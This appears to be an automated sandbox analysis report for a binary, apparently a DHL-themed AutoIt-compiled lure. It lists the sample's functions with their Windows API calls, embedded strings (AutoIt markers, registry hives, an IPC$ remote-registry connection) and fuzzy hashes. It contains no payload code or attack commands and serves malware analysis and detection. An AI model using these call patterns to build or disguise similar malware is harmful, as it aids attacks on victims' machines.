                                                                                    • API String ID: 1297703922-3619404913
                                                                                    • Opcode ID: 8764f3c94f30714e438902c461e76a4ff1872f18c9e981e498dd1b65d6a83554
                                                                                    • Instruction ID: 8550168ed48f142d8627de89df449d7ce7f01ddf3e08ed57c281040886beb5bf
                                                                                    • Opcode Fuzzy Hash: 8764f3c94f30714e438902c461e76a4ff1872f18c9e981e498dd1b65d6a83554
                                                                                    • Instruction Fuzzy Hash: F3717870540205AFDB29CF28CC49FAA7BE5FB88704F04492DF985C72A1D7B5E942CB96
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0083C627
                                                                                      • Part of subcall function 0083AB37: ClientToScreen.USER32(?,?), ref: 0083AB60
                                                                                      • Part of subcall function 0083AB37: GetWindowRect.USER32(?,?), ref: 0083ABD6
                                                                                      • Part of subcall function 0083AB37: PtInRect.USER32(?,?,0083C014), ref: 0083ABE6
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0083C690
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0083C69B
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0083C6BE
                                                                                    • _wcscat.LIBCMT ref: 0083C6EE
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0083C705
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0083C71E
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0083C735
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0083C757
                                                                                    • DragFinish.SHELL32(?), ref: 0083C75E
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0083C851
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 8579a6cbd820e1902c27dd170cb1654d49951468f61f66b8067edbf5b798a0d6
                                                                                    • Instruction ID: 468077b67fbd8b2b6810814ecc283c3ecb1f5243e154aba313a05368fa441d52
                                                                                    • Opcode Fuzzy Hash: 8579a6cbd820e1902c27dd170cb1654d49951468f61f66b8067edbf5b798a0d6
                                                                                    • Instruction Fuzzy Hash: 51614E71508300AFC705EF64DC89E9BBBE8FFD9750F00092DF695922A1DB749949CB92
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00834424
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0083446F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: 5a60f79e2bec0211444339893185422c4d0c9a6b2784edf88babdae3ca651ca1
                                                                                    • Instruction ID: 26ec33fc4f184d741f6d8cb4b8bb5fc2dd0c5ed9b0fb40b753647d15ff34037a
                                                                                    • Opcode Fuzzy Hash: 5a60f79e2bec0211444339893185422c4d0c9a6b2784edf88babdae3ca651ca1
                                                                                    • Instruction Fuzzy Hash: 5A917B702047019FCB04EF14C856BAEB7A1FF95354F059868F9A69B3A2DB34ED09CB81
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0083B8B4
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008391C2), ref: 0083B910
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0083B949
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0083B98C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0083B9C3
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0083B9CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083B9DF
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,008391C2), ref: 0083B9EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0083BA0B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0083BA17
                                                                                      • Part of subcall function 007D2EFD: __wcsicmp_l.LIBCMT ref: 007D2F86
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: a12f8b24fa9bb52c70580fa8b0f5347daadbfc341a94d0be0d71b4de77b83850
                                                                                    • Instruction ID: 1545852ab8d3261524be0d5a8e202a57f631d433737856b905e83ac30b58853f
                                                                                    • Opcode Fuzzy Hash: a12f8b24fa9bb52c70580fa8b0f5347daadbfc341a94d0be0d71b4de77b83850
                                                                                    • Instruction Fuzzy Hash: EB61EDB1900219FAEB14DF64CC45FBA7BA8FB48720F104516FE15D61C2EB789991DBE0
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0081DCDC
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0081DCEC
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0081DCF8
                                                                                    • __wsplitpath.LIBCMT ref: 0081DD56
                                                                                    • _wcscat.LIBCMT ref: 0081DD6E
                                                                                    • _wcscat.LIBCMT ref: 0081DD80
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081DD95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DDA9
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DDDB
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DDFC
                                                                                    • _wcscpy.LIBCMT ref: 0081DE08
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0081DE47
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: 21e393b64be7a503a49f414f02eb521493510f7ebc19521e60b6420fb75aa272
                                                                                    • Instruction ID: 10ba4be496a0ea2b71fcfaf6ac5d197ec6d9bede119e000a1cced1205ef1ec6b
                                                                                    • Opcode Fuzzy Hash: 21e393b64be7a503a49f414f02eb521493510f7ebc19521e60b6420fb75aa272
                                                                                    • Instruction Fuzzy Hash: 046139725043459FCB10EF64C844AEAB3E8FF89314F04492AFA99C7251DB35E985CB92
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00819C7F
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00819CA0
                                                                                    • __swprintf.LIBCMT ref: 00819CF9
                                                                                    • __swprintf.LIBCMT ref: 00819D12
                                                                                    • _wprintf.LIBCMT ref: 00819DB9
                                                                                    • _wprintf.LIBCMT ref: 00819DD7
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 311963372-3080491070
                                                                                    • Opcode ID: c287ff5fa8117e86bfe34283657ca72089c712c3bef0e962439d61fd40214d8c
                                                                                    • Instruction ID: 0a99138e670616be71944e844b49863f6503e97aa361d7d317cd197d142bd20a
                                                                                    • Opcode Fuzzy Hash: c287ff5fa8117e86bfe34283657ca72089c712c3bef0e962439d61fd40214d8c
                                                                                    • Instruction Fuzzy Hash: 61517171900509EACF18EBE0DD5AEEEB778FF14300F500565F509B21A2EB396E99CB61
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0081A3CB
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0081A418
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A460
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A497
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A4C5
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 2698844021-4113822522
                                                                                    • Opcode ID: 75a934b75b113e24f79831dae96fa91d4017558cfc1f728ea7e064cd5eaacc9d
                                                                                    • Instruction ID: 0817168aca3b754338961649034edcc4bfe211bf55eeb270a4723f8d20da72f0
                                                                                    • Opcode Fuzzy Hash: 75a934b75b113e24f79831dae96fa91d4017558cfc1f728ea7e064cd5eaacc9d
                                                                                    • Instruction Fuzzy Hash: E9514B71104305DFC704EF20C895AAAB7F8FF94718F00896DF89A972A1DB35AD09CB92
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0080F8DF
                                                                                    • LoadStringW.USER32(00000000,?,007EE029,00000001), ref: 0080F8E8
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00875310,?,00000FFF,?,?,007EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0080F90A
                                                                                    • LoadStringW.USER32(00000000,?,007EE029,00000001), ref: 0080F90D
                                                                                    • __swprintf.LIBCMT ref: 0080F95D
                                                                                    • __swprintf.LIBCMT ref: 0080F96E
                                                                                    • _wprintf.LIBCMT ref: 0080FA17
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0080FA2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 984253442-2268648507
                                                                                    • Opcode ID: ef6211b993df91972901e91cfe94d3f87ff93ee2838deaf9694506f90d297a4c
                                                                                    • Instruction ID: 850961f586a665a350d7db16b73851796c9ee0c8d520e48ec346cd68e5829dba
                                                                                    • Opcode Fuzzy Hash: ef6211b993df91972901e91cfe94d3f87ff93ee2838deaf9694506f90d297a4c
                                                                                    • Instruction Fuzzy Hash: 76414E72904219EACF18FBE0DD8AEEE7778EF54300F500465F605B2192EA396F49CB61
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00839207,?,?), ref: 0083BA56
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA6D
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA78
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA85
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0083BA8E
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA9D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0083BAA6
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BAAD
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BABE
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00842CAC,?), ref: 0083BAD7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0083BAE7
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0083BB0B
                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0083BB36
                                                                                    • DeleteObject.GDI32(00000000), ref: 0083BB5E
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0083BB74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 8dbecf5922de0c440a8cf14ef4216445deb3c8f68638d51f90165e27c42638b9
                                                                                    • Instruction ID: f363026e45776c91ccb6afb2437948b61628be0bf3938646dfd98cfc1c8a99c3
                                                                                    • Opcode Fuzzy Hash: 8dbecf5922de0c440a8cf14ef4216445deb3c8f68638d51f90165e27c42638b9
                                                                                    • Instruction Fuzzy Hash: A8413A75A00208EFDB119F65DC88EABBBB8FFC9711F104468FA09D7261D7309A01CBA0
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 0081DA10
                                                                                    • _wcscat.LIBCMT ref: 0081DA28
                                                                                    • _wcscat.LIBCMT ref: 0081DA3A
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081DA4F
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DA63
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0081DA7B
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0081DA95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DAA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: ee38ecdd1b50284ff0c801765da812a8de10cb1a35d59eed57c8620cabb3644c
                                                                                    • Instruction ID: 0119439de81b9be7ef4b5c91f50cdf8bbcdb400e584b6ca120f9dd62f4fa1bbf
                                                                                    • Opcode Fuzzy Hash: ee38ecdd1b50284ff0c801765da812a8de10cb1a35d59eed57c8620cabb3644c
                                                                                    • Instruction Fuzzy Hash: EA8171B15043459FCB24DF64C844BEABBE8FF89314F14892EF989C7251D634E985CB52
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0083C1FC
                                                                                    • GetFocus.USER32 ref: 0083C20C
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0083C217
                                                                                    • _memset.LIBCMT ref: 0083C342
                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0083C36D
                                                                                    • GetMenuItemCount.USER32(?), ref: 0083C38D
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0083C3A0
                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0083C3D4
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0083C41C
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0083C454
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0083C489
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: 5f3f32b92430197dd2a37faa0f149246fa4f0f00d2ec5114d122ce8084ab91af
                                                                                    • Instruction ID: bcb54f02eafb8fa7032bd9d8897e6a764736db85f5dc4edbbf417e729d7623e3
                                                                                    • Opcode Fuzzy Hash: 5f3f32b92430197dd2a37faa0f149246fa4f0f00d2ec5114d122ce8084ab91af
                                                                                    • Instruction Fuzzy Hash: B1815A71608311AFDB14DF24C894A6BBBE8FBC8714F00492EFA95E7291D771D905CBA2
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0082738F
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0082739B
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 008273A7
                                                                                    • SelectObject.GDI32(00000000,?), ref: 008273B4
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00827408
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00827444
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00827468
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00827470
                                                                                    • DeleteObject.GDI32(?), ref: 00827479
                                                                                    • DeleteDC.GDI32(00000006), ref: 00827480
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0082748B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: 4e942fd4963e3385f3704b7a9b0e2e5b938482d7a1e61d7b4f361976190efca7
                                                                                    • Instruction ID: 76c4280fc3597d8d166a93f9622adddd549c493e92fe6154aa9d24a189c438b5
                                                                                    • Opcode Fuzzy Hash: 4e942fd4963e3385f3704b7a9b0e2e5b938482d7a1e61d7b4f361976190efca7
                                                                                    • Instruction Fuzzy Hash: 34513871904619EFCB14CFA9DC89EAEBBB9FF88310F14842DEA5997211D731A9408B90
                                                                                    APIs
                                                                                      • Part of subcall function 007D0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007B6B0C,?,00008000), ref: 007D0973
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007B6BAD
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007B6CFA
                                                                                      • Part of subcall function 007B586D: _wcscpy.LIBCMT ref: 007B58A5
                                                                                      • Part of subcall function 007D363D: _iswctype.LIBCMT ref: 007D3645
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 537147316-1018226102
                                                                                    • Opcode ID: c463eb1290372fd7ce17d5b4a760b166eabdb041824d5eb0937db87182704f01
                                                                                    • Instruction ID: 72c42d8357b43631fb4e24ecb425220c786f7de9003c2de2e92d47511b5a144b
                                                                                    • Opcode Fuzzy Hash: c463eb1290372fd7ce17d5b4a760b166eabdb041824d5eb0937db87182704f01
                                                                                    • Instruction Fuzzy Hash: D6026770108380DFC724EF24C885AAFBBE5BF99314F14491DF599972A2DB38E949CB52
APIs
• _memset.LIBCMT ref: 00812D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00812DDD
• GetMenuItemCount.USER32(00875890), ref: 00812E66
• DeleteMenu.USER32(00875890,00000005,00000000,000000F5,?,?), ref: 00812EF6
• DeleteMenu.USER32(00875890,00000004,00000000), ref: 00812EFE
• DeleteMenu.USER32(00875890,00000006,00000000), ref: 00812F06
• DeleteMenu.USER32(00875890,00000003,00000000), ref: 00812F0E
• GetMenuItemCount.USER32(00875890), ref: 00812F16
• SetMenuItemInfoW.USER32(00875890,00000004,00000000,00000030), ref: 00812F4C
• GetCursorPos.USER32(?), ref: 00812F56
• SetForegroundWindow.USER32(00000000), ref: 00812F5F
• TrackPopupMenuEx.USER32(00875890,00000000,?,00000000,00000000,00000000), ref: 00812F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00812F7E
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
APIs
  • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
• _memset.LIBCMT ref: 0080786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008078A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008078BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008078D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00807902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0080792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00807935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0080793A
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007EE2A0,00000010,?,Bad directive syntax error,0083F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0080F7C2
• LoadStringW.USER32(00000000,?,007EE2A0,00000010), ref: 0080F7C9
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
• _wprintf.LIBCMT ref: 0080F7FC
• __swprintf.LIBCMT ref: 0080F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0080F88D
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
APIs
  • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
  • Part of subcall function 007B7924: _memmove.LIBCMT ref: 007B79AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00815330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00815346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00815357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00815369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0081537A
Similarity
• API ID: SendString$_memmove
